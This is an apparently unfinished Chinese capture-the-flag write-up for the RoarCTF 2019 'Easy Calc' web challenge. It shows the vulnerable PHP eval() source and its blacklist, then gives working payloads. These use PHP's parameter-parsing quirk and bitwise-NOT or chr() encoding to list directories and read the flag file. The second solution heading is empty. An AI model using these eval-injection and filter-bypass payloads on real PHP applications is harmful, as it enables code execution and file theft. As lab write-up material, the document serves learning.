未完成[RoarCTF 2019]Easy Calc

[RoarCTF 2019]Easy Calc

考点

PHP7参数解析特性
代码执行bypass

wp

访问calc.php看到源码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

解法一

利用 php 的解析特性，以及补数编码或者异或编码进行绕过
以下payload在?后有个空格
? num=1;var_dump(scandir((~%D1%D0))) 扫描当前目录
? num=1;var_dump(scandir((~%D0))) 扫描根目录，发现 flag 文件 flagg
? num=1;var_dump(readfile((~%D0%99%CE%9E%98%98))) 读取 flag
或者利用chr函数将非法字符串进行编码
? num=1;var_dump(scandir(chr(47)))
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

解法二

上一页[红明谷CTF 2021]write_shell 下一页[极客大挑战 2019]RCE ME

最后更新于 3年前

hashtag[RoarCTF 2019]Easy Calc

hashtag考点

hashtagwp

hashtag解法一

hashtag解法二

[RoarCTF 2019]Easy Calc

考点

wp

解法一

解法二